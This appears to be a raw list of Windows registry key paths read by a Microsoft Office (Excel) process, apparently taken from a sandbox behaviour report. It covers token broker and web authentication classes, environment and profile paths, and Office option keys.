HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Policies\Microsoft\AuthN
HKEY_CURRENT_USER\Software\Microsoft\AuthN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\DisableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ProviderIds
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ExtensionType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ExtensionCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\ProviderIds
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\ExtensionType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\ExtensionCapabilities
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-932793227-1321892499-785312009-1001
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-932793227-1321892499-785312009-1001
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-932793227-1321892499-785312009-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node
HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\DefaultUserEnviroment
HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnviroment
HKEY_CURRENT_USER\Environment
HKEY_CURRENT_USER\Volatile Environment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MsoTbCust
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CmdBarData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Toolbars
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\BtnSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Tooltips
HKEY_CURRENT_USER\Volatile Environment\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\EnablePaneManagement
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft Excel AWDropdownHidden
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\StatusBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\StatusBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAccChecker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InProcHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Avalon.Graphics
HKEY_LOCAL_MACHINE\Software\Microsoft\Avalon.Graphics
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SplashScreenLicense
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Sort
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TrustCenter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\EnableLogging
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SmartList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Gfx
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Gfx
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\FontSmoothingThreshold
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Wow6432Node\Microsoft\Windows\Tablet PC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Tablet PC
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\Tablet PC\IsTabletPC
